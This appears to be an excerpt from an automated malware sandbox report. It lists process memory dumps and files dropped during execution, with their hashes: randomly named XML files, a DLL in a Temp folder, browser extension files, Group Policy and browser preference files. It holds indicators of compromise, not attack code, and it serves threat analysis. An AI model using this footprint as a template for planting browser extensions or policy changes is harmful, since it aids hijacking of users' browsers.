memory/4708-71-0x0000000003230000-0x0000000003240000-memory.dmp

memory/4708-82-0x00000000041E0000-0x0000000004534000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7cd1fc869c686c660073b9e811a89e3c
SHA1 67acf340bead8ee326dacbb3f9c9e91775d8adac
SHA256 c6a11f8fc328b7619e240da4d08b884472b562ea5607da2481c32cb8fca87c9c
SHA512 0a584776f135737967d6d7e61fabb75d78127fb9e2ce734e306db86d337b078b59a41a942f6ed9809fbef203dcd00919abe4eca07effc1b0a65a5e2df3351492

memory/4708-85-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/4432-97-0x000001D9F8FB0000-0x000001D9F8FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f7ea21a8fddaba9501a691d170906825
SHA1 b7ce7dd9b54c9b47f1b5e718450992293ab707d0
SHA256 8ed5c87fa3283933acf4db8d457a291c12081eca783337cce61a1e52d9b240bc
SHA512 16aa131666d33ff4b7c0789482707ce29050a2ede1166670ade15d77c7c542261c8de9fcda3e7e26a7ffd9587f5ab4ec36f36a52eeb467ec0c98b537243a66a3

memory/4432-100-0x000001D9F6E30000-0x000001D9F6E40000-memory.dmp

memory/4432-99-0x000001D9F6E30000-0x000001D9F6E40000-memory.dmp

memory/4432-98-0x00007FFA2AD20000-0x00007FFA2B7E1000-memory.dmp

memory/4432-104-0x00007FFA2AD20000-0x00007FFA2B7E1000-memory.dmp

memory/4644-105-0x00000000006F0000-0x0000000000DA5000-memory.dmp

memory/3912-110-0x0000000000170000-0x0000000000825000-memory.dmp

memory/4644-111-0x00000000006F0000-0x0000000000DA5000-memory.dmp

memory/3912-112-0x0000000010000000-0x0000000011E5C000-memory.dmp

memory/4016-125-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/4016-127-0x0000000003280000-0x0000000003290000-memory.dmp

memory/4016-129-0x0000000003280000-0x0000000003290000-memory.dmp

memory/3912-123-0x00000000025F0000-0x0000000002675000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f5caea41ccb7c13988a362ef6b2f3a1c
SHA1 f31ad94f89bd21eb58f73ec83b11613f9ef3f199
SHA256 1a90087699459e1c6d059bc5739b1a7270c3ebe493778a70bd5b2bbf4194061a
SHA512 db305daae6c012b820da9186f94a6f8a1cc8e1e3e4ba9d7eafa6523b8bc3188310a338750684dd2e062e36e7882dab3892325a3025045d62572c000e118cc65a

memory/4016-160-0x0000000004CF0000-0x0000000004D3C000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 3a8199aab1c74eae07fe583af9439e48
SHA1 28bbd7e62698c90631cd51ab23e773a1a9a2fe1b
SHA256 de3c96adcc032cf625d6811ac747c5189e2dfd7d4b097cb019bbeee552b1f2cb
SHA512 730d34973229a6a28e0584fae5ac307bb399907061b78563db648877579587fec59dd5eedcab9a565e770806950829a5fa58fb72db00d178e234897186351c3d

memory/4016-171-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/3912-181-0x0000000002FE0000-0x0000000003047000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 fb11ad5cc456952496ec84f9330e7017
SHA1 75457e8a9d40a5a63e72bc80c5ec974761185898
SHA256 181ae1748ee78f79f3fb2956a71ba0959082b9e67f2a72dc2b459110bb2be859
SHA512 a2252651ea91142e9a21896455b43f7162c15992bef62725af6201f5cacbc5f3c646e465c6e311a9a261549092b59c659e4b23ee940ea7af04e373b7d4564e1b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml

MD5 8d0a21d486dcd77ab10e1804e0348b28
SHA1 a79fb9c55a546c2c154a650bfe05630ebb5278af
SHA256 b2d0283e798b6a410c7d86fd7404997e1ced14c5ee2153bfab80d2261776a032
SHA512 f9ee6f8d4a143a3155739109ad4b1a63c6e63a36f0b89f12d3aac6c10065bd0c2f388749c5a45c8f138b8c9685f088cd153266f7ac7370eb8081a45766061807

C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml

MD5 0d77523629a6adfdb0982221e53fbc67
SHA1 c7eccf68eefed77f929a4316bd0e3c11f9573755
SHA256 78f3d2fe4f2c931611b9600ec31b1d69975d30ceec051dea9143beb3998eb01c
SHA512 0a4d1e2fe4eede33d6334c4aa20a86164da4d521e2d2575e0c46419db8de7ff32d76fbca56311eff52893f61b1fc06dac4bb222c7cecf6b4e94a869b50901846

C:\ProgramData\hdPjkOXNzukcsjVB\cntsWEX.xml

MD5 45eaebc48b488978ca753bd709465b8c
SHA1 bdccf353bf5f6b4a2210f547a70d79b94e7c7044
SHA256 bbe1d2ca2b6c8b775a6860fd7b1f94eaeb5f4371f7ac98fa73cd571b9ee7aeb2
SHA512 74a2e98e54fe50123d3bf228a405eaebb22e66388f5e96cfe320c622ebfd27f4b82f4777febd32934464850052e5e406e9419c8d5a51679a2a0a77b49e8dba7f

C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml

MD5 ebc5dd911d60d18866419aa5d21bda06
SHA1 1860762977cf57cffcf78d0ccc19f2f98d887080
SHA256 09c5f307856e0740cf6c7a5320939a9b117bb58b35f5fe13319e1e5f1707a3db
SHA512 01c08e2df9612dc047991e129c86a5e08ffd5e61c28cb48d5029519431fd1bf616a3af513ec2d547314e62bb92e85a958d446b0358080dcaafe32132de7f17e2

C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml

MD5 32dbe186449b9e95e474a229372a02fb
SHA1 e17a10c3676caa434ad5d6e0aba162f76dfa0cd6
SHA256 d8da474142896decd552581966103be1c743c7a52675a649f8b97e51ffefcb1a
SHA512 3c953ed4b866dbc8e927133fc447ed4ba87927985a99b9ad921fd05108b9079fa81bb4f3134f05f3fd8702c4ad1833b792bfb2b39a91693813744d3c92b71555

C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll

MD5 09033b0a28848c69df1d9123aa263242
SHA1 ea1f63365ab26e8250eec85496f7b7baab1c5619
SHA256 fc35ae17402f158f5fc7f179d35542c363ca5681c82e72d7f0f59f80f86b2ee7
SHA512 9e99a8a584f4831bed290361d719e6a9561455d22b9e650d68d970d2258bd7db465edc7b9c9a9e9565aeefbe871e298dba66470c260b51e4482b76d43f13097d

memory/3912-511-0x0000000003050000-0x00000000030D3000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0etkwu5l.default-release\prefs.js

MD5 0fccc75bd9c0494a133798b5b6d398da
SHA1 d7b23c6bf04704834ead0e99a4ac907a652e0719
SHA256 be435e0cfc5a5a78e736bcd57bf76725f5a91e3ce5d099eeeab9084e8deb2682
SHA512 6443c4d9e07059b032905863b108a62fb4d8749ae3afcdc746e92f7e3abaccadb4accc32dfad893d4bc926769a26beb4836e3c216e9e378342d22de38262f634

memory/3912-526-0x0000000003950000-0x0000000003A1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 95e6fb5db9e2ca61ea5b4309d1aff816
SHA1 87fd996b8afbc0c159925b6e7238835bba8f22dd
SHA256 bd8fa2732c22533fe8ec7e136276d787e411b664807b49cfe86503e49837186e
SHA512 179e514f84d59cbfbcf065172f662761c199927d41bc33ea0eded7067659e8f03beba1d5d1085a3c7e1997cb993119f3ea94076c9fa9ff7c84dd3c6fe7079b84

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4a7b328f04beb47b6ac54bcf9d5ae4d3
SHA1 e45aa1edbb79c8148c55b647a9f62de6c961e4e1
SHA256 a5148b8448cd17b6eecf2c997f9cbb40ad8271ac55b0a0215b0c1a979289c850
SHA512 a37a30b3d0fa3770b9bfe92c56e8c5d1d05fd11707d4d16a38ef1fc320da848f447df4a52e34b1bff8a0322519a1dfbf833542ebc13a55a5e5751b1bf0ff36a6

memory/4916-564-0x00000000021A0000-0x0000000003FFC000-memory.dmp

memory/1648-585-0x00000000008B0000-0x0000000000F65000-memory.dmp

memory/3912-598-0x0000000000170000-0x0000000000825000-memory.dmp